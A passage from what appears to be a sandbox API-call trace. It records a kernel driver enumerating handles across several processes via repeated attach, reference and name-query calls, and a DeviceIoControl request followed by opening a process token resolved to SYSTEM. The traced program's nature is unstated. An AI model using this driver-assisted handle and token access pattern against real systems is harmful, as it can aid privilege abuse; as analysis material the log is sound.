AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693f54c0, HandleInformation=0x0) returned 0x0 [0289.385] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.385] PsReleaseProcessExitSynchronization () returned 0x2 [0289.385] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803f [0289.385] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.385] ObfDereferenceObject (Object=0xffffe000693f54c0) returned 0x7ffe [0289.385] IoCompleteRequest () returned 0x0 [0289.385] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.385] PsAcquireProcessExitSynchronization () returned 0x0 [0289.385] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400) [0289.385] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006957cf20, HandleInformation=0x0) returned 0x0 [0289.385] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.385] PsReleaseProcessExitSynchronization () returned 0x2 [0289.385] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803e [0289.385] ObQueryNameString (in: Object=0xffffe0006957cf20, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.385] ObfDereferenceObject (Object=0xffffe0006957cf20) returned 0x7fff [0289.385] IoCompleteRequest () returned 0x0 [0289.385] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.385] PsAcquireProcessExitSynchronization () returned 0x0 [0289.385] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400) [0289.385] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069538700, HandleInformation=0x0) returned 0x0 [0289.385] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.385] PsReleaseProcessExitSynchronization () returned 0x2 [0289.385] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803d [0289.385] ObQueryNameString (in: Object=0xffffe00069538700, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.385] ObfDereferenceObject (Object=0xffffe00069538700) returned 0x800e [0289.385] IoCompleteRequest () returned 0x0 [0289.385] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.385] PsAcquireProcessExitSynchronization () returned 0x0 [0289.386] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400) [0289.386] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069580550, HandleInformation=0x0) returned 0x0 [0289.386] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.386] PsReleaseProcessExitSynchronization () returned 0x2 [0289.386] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803c [0289.386] ObQueryNameString (in: Object=0xffffe00069580550, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.386] ObfDereferenceObject (Object=0xffffe00069580550) returned 0x800e [0289.386] IoCompleteRequest () returned 0x0 [0289.386] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.386] PsAcquireProcessExitSynchronization () returned 0x0 [0289.386] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000ac0cf400) [0289.386] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067ed8090, HandleInformation=0x0) returned 0x0 [0289.386] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.386] PsReleaseProcessExitSynchronization () returned 0x2 [0289.386] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2803b [0289.386] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.386] ObfDereferenceObject (Object=0xffffe00067ed8090) returned 0x7ffc [0289.386] IoCompleteRequest () returned 0x0 [0289.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0289.386] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.386] PsAcquireProcessExitSynchronization () returned 0x0 [0289.386] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.386] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067ec8aa0, HandleInformation=0x0) returned 0x0 [0289.386] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.386] PsReleaseProcessExitSynchronization () returned 0x2 [0289.386] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x3801b [0289.386] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.386] ObfDereferenceObject (Object=0xffffe00067ec8aa0) returned 0x7ffe [0289.386] IoCompleteRequest () returned 0x0 [0289.387] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.387] PsAcquireProcessExitSynchronization () returned 0x0 [0289.387] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.388] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696d1700, HandleInformation=0x0) returned 0x0 [0289.388] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.388] PsReleaseProcessExitSynchronization () returned 0x2 [0289.388] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x3801a [0289.388] ObQueryNameString (in: Object=0xffffe000696d1700, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.388] ObfDereferenceObject (Object=0xffffe000696d1700) returned 0x7ffe [0289.388] IoCompleteRequest () returned 0x0 [0289.388] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.388] PsAcquireProcessExitSynchronization () returned 0x0 [0289.388] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.388] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e6e5a0, HandleInformation=0x0) returned 0x0 [0289.388] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.388] PsReleaseProcessExitSynchronization () returned 0x2 [0289.388] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38019 [0289.388] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.388] ObfDereferenceObject (Object=0xffffe00067e6e5a0) returned 0x7fff [0289.388] IoCompleteRequest () returned 0x0 [0289.388] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.388] PsAcquireProcessExitSynchronization () returned 0x0 [0289.388] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.388] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e56550, HandleInformation=0x0) returned 0x0 [0289.388] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.388] PsReleaseProcessExitSynchronization () returned 0x2 [0289.388] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38018 [0289.388] ObQueryNameString (in: Object=0xffffe00067e56550, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.388] ObfDereferenceObject (Object=0xffffe00067e56550) returned 0x7ffd [0289.388] IoCompleteRequest () returned 0x0 [0289.388] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.388] PsAcquireProcessExitSynchronization () returned 0x0 [0289.388] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.389] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e6ae40, HandleInformation=0x0) returned 0x0 [0289.389] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.389] PsReleaseProcessExitSynchronization () returned 0x2 [0289.389] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38017 [0289.389] ObQueryNameString (in: Object=0xffffe00067e6ae40, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.389] ObfDereferenceObject (Object=0xffffe00067e6ae40) returned 0x7ffd [0289.389] IoCompleteRequest () returned 0x0 [0289.389] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.389] PsAcquireProcessExitSynchronization () returned 0x0 [0289.389] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.389] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d2690, HandleInformation=0x0) returned 0x0 [0289.389] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.389] PsReleaseProcessExitSynchronization () returned 0x2 [0289.389] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38016 [0289.389] ObQueryNameString (in: Object=0xffffe000697d2690, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.389] ObfDereferenceObject (Object=0xffffe000697d2690) returned 0x7ff2 [0289.389] IoCompleteRequest () returned 0x0 [0289.389] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.389] PsAcquireProcessExitSynchronization () returned 0x0 [0289.389] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.389] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d1310, HandleInformation=0x0) returned 0x0 [0289.389] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.389] PsReleaseProcessExitSynchronization () returned 0x2 [0289.389] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38015 [0289.389] ObQueryNameString (in: Object=0xffffe000697d1310, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.389] ObfDereferenceObject (Object=0xffffe000697d1310) returned 0x7ff4 [0289.389] IoCompleteRequest () returned 0x0 [0289.389] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.389] PsAcquireProcessExitSynchronization () returned 0x0 [0289.390] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.390] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d5d30, HandleInformation=0x0) returned 0x0 [0289.390] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.390] PsReleaseProcessExitSynchronization () returned 0x2 [0289.390] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38014 [0289.390] ObQueryNameString (in: Object=0xffffe000697d5d30, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.390] ObfDereferenceObject (Object=0xffffe000697d5d30) returned 0x7ffd [0289.390] IoCompleteRequest () returned 0x0 [0289.390] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.390] PsAcquireProcessExitSynchronization () returned 0x0 [0289.390] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.390] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d5920, HandleInformation=0x0) returned 0x0 [0289.390] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.390] PsReleaseProcessExitSynchronization () returned 0x2 [0289.390] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38013 [0289.390] ObQueryNameString (in: Object=0xffffe000697d5920, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.390] ObfDereferenceObject (Object=0xffffe000697d5920) returned 0x7ff1 [0289.390] IoCompleteRequest () returned 0x0 [0289.390] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.390] PsAcquireProcessExitSynchronization () returned 0x0 [0289.390] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.390] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d5bc0, HandleInformation=0x0) returned 0x0 [0289.390] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.390] PsReleaseProcessExitSynchronization () returned 0x2 [0289.390] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38012 [0289.390] ObQueryNameString (in: Object=0xffffe000697d5bc0, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.390] ObfDereferenceObject (Object=0xffffe000697d5bc0) returned 0x7ffd [0289.390] IoCompleteRequest () returned 0x0 [0289.390] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.391] PsAcquireProcessExitSynchronization () returned 0x0 [0289.391] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000ac0cf400) [0289.391] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d7900, HandleInformation=0x0) returned 0x0 [0289.391] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.391] PsReleaseProcessExitSynchronization () returned 0x2 [0289.391] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x38011 [0289.391] ObQueryNameString (in: Object=0xffffe000697d7900, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.391] ObfDereferenceObject (Object=0xffffe000697d7900) returned 0x7ffd [0289.391] IoCompleteRequest () returned 0x0 [0289.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0289.391] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.391] PsAcquireProcessExitSynchronization () returned 0x0 [0289.391] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400) [0289.391] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067eda8f0, HandleInformation=0x0) returned 0x0 [0289.391] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.391] PsReleaseProcessExitSynchronization () returned 0x2 [0289.391] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28075 [0289.391] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.391] ObfDereferenceObject (Object=0xffffe00067eda8f0) returned 0x7ffe [0289.391] IoCompleteRequest () returned 0x0 [0289.391] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.391] PsAcquireProcessExitSynchronization () returned 0x0 [0289.391] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400) [0289.391] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693e4090, HandleInformation=0x0) returned 0x0 [0289.391] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.391] PsReleaseProcessExitSynchronization () returned 0x2 [0289.391] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28074 [0289.391] ObQueryNameString (in: Object=0xffffe000693e4090, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.391] ObfDereferenceObject (Object=0xffffe000693e4090) returned 0x7fff [0289.391] IoCompleteRequest () returned 0x0 [0289.391] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.391] PsAcquireProcessExitSynchronization () returned 0x0 [0289.391] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400) [0289.391] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d8f770, HandleInformation=0x0) returned 0x0 [0289.391] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.391] PsReleaseProcessExitSynchronization () returned 0x2 [0289.391] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28073 [0289.391] ObQueryNameString (in: Object=0xffffe00069d8f770, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.392] ObfDereferenceObject (Object=0xffffe00069d8f770) returned 0x7ffe [0289.392] IoCompleteRequest () returned 0x0 [0289.392] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.392] PsAcquireProcessExitSynchronization () returned 0x0 [0289.392] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400) [0289.392] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006980c2d0, HandleInformation=0x0) returned 0x0 [0289.392] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.392] PsReleaseProcessExitSynchronization () returned 0x2 [0289.392] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28072 [0289.392] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.392] ObfDereferenceObject (Object=0xffffe0006980c2d0) returned 0x7ffd [0289.392] IoCompleteRequest () returned 0x0 [0289.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x188 [0289.392] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.392] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00067eea080, HandleInformation=0x0) returned 0x0 [0289.392] ObOpenObjectByPointer (in: Object=0xffffe00067eea080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.392] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x67ff6 [0289.392] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe0006a765c80 | out: TokenHandle=0xffffe0006a765c80*=0x18c) returned 0x0 [0289.392] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.392] IoCompleteRequest () returned 0x0 [0289.392] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.392] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.393] CloseHandle (hObject=0x18c) returned 1 [0289.393] CloseHandle (hObject=0x188) returned 1 [0289.393] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.393] PsAcquireProcessExitSynchronization () returned 0x0 [0289.393] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400) [0289.393] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067eb7480, HandleInformation=0x0) returned 0x0 [0289.393] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.393] PsReleaseProcessExitSynchronization () returned 0x2 [0289.393] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff4 [0289.393] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.393] ObfDereferenceObject (Object=0xffffe00067eb7480) returned 0x7ffe [0289.393] IoCompleteRequest () returned 0x0 [0289.393] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.393] PsAcquireProcessExitSynchronization () returned 0x0 [0289.393] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400) [0289.393] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e9e090, HandleInformation=0x0) returned 0x0 [0289.393] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) 